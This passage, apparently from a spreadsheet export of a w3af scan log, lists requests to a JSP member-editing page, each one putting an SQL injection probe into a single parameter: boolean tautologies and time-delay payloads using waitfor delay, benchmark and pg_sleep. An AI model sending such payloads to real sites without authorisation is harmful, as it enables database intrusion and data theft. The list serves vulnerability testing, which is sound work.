    <t>/antoanweb/miembros/editar.jsp?cp=4'+and+'4'='5&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=4+or+4=4+&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=4+and+4=5+&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1;waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1);waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1));waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1';waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1');waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1'));waitfor+delay+'0:0:5'--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1+or+benchmark(2500000,md5(1))&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1+or+pg_sleep(5)&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1'+or+pg_sleep(5)+or+'1'='1&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=1"+or+pg_sleep(5)+or+"1"="1&amp;provincia=50&amp;dni=56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frame30.&amp;email=w3af@email.com&amp;login=38"+or+"38"="38</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=38"+and+"38"="39</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=38'+or+'38'='38</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=38'+and+'38'='39</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=38+or+38=38+</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=38+and+38=39+</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar"+or+"49"="49&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar"+and+"49"="50&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar'+or+'49'='49&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar'+and+'49'='50&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1;waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1);waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1';waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1');waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1'));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1+or+benchmark(2500000,md5(1))&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1+or+pg_sleep(5)&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1'+or+pg_sleep(5)+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=1"+or+pg_sleep(5)+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=25"+or+"25"="25&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=25"+and+"25"="26&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=25'+or+'25'='25&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=25'+and+'25'='26&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=25+or+25=25+&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=25+and+25=26+&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1;waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1);waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1';waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1');waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+benchmark(2500000,md5(1))&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+pg_sleep(5)&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+pg_sleep(5)+or+'1'='1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+pg_sleep(5)+or+"1"="1&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0"+or+"87"="87&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0"+and+"87"="88&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0'+or+'87'='87&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0'+and+'87'='88&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0+or+87=87+&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0+and+87=88+&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1;waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1);waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1));waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1';waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1');waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1'));waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1+or+benchmark(2500000,md5(1))&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1+or+pg_sleep(5)&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1'+or+pg_sleep(5)+or+'1'='1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=1"+or+pg_sleep(5)+or+"1"="1&amp;login=56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46"+or+"46"="46&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=46"+and+"46"="47&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=46'+or+'46'='46&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=46'+and+'46'='47&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
